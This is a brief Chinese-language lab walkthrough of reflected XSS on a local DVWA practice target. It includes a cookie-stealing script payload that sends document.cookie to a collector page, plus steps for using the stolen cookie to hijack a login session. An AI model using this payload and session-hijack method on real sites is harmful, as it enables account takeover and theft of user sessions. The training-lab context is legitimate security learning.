首先呢,需要先有一個dvwa的靶場,我這里是在本地搭建了一個,先訪問127.0.0.1,正常用戶名密碼登錄
這里就以low級別進行操作
選擇反射型xss題目,先使用彈窗測試一下<script>alert(123)</script>
確定可以使用代碼之后,在搭建的服務器目錄下創建一個cookie.php,我這里是C:\wamp\www(僅供參考)
目的是為了將獲取到的cookie,保存到cookie.php所在目錄下自動生成一個cookie.txt
接下來需要根據題目構造js語句
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
將js語句輸入,提交,成功的話會跳轉到另一個界面
現在我先查看一下文件目錄,可以看到是已經成功創建了一個名為cookie.txt的文本
另外能夠看到瀏覽器url框內有一個cookie的值
獲取到cookie后打開另外一個瀏覽器訪問dvwa(因為本地搭建原因,除非重新打開瀏覽器,否則cookie不能正常刷新,所以直接打開另一個瀏覽器方便一些),f12打開開發者工具,找到cookie值
將之前獲取到的cookie值給替換上去,把security的impossible改為low,回到登錄界面,在url后面加上獲取到的cookie信息
ok,已經成功利用獲取到的cookie進行登錄
另外划重點,這個文檔僅供學習參考,任何讀者用來做壞事,后果自負!!!
這個文檔僅供學習參考,任何讀者用來做壞事,后果自負!!!
這個文檔僅供學習參考,任何讀者用來做壞事,后果自負!!!
重要的事說三遍